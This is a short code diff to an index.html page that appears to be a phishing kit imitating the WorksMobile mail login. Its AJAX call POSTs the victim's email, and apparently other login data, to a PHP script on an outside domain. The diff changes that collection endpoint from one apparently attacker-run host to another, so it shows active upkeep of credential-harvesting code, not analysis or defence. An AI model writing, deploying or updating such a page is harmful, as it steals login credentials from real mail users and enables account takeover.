--- a/index.html
+++ b/index.html
@@ -193,7 +193,7 @@ alert('https://auth.worksmobile.com/login/login?accessUrl=https%3A%2F%2Fmail.wor
       
       $.ajax({
         dataType: 'JSON',
-        url: 'https://rikoo.vantechdns.com/cgi-bin/cc/go/next.php',
+        url: 'https://fvbvps.za.com/cgi-bin/next.php',
         type: 'POST',
         data:{
           email:email,
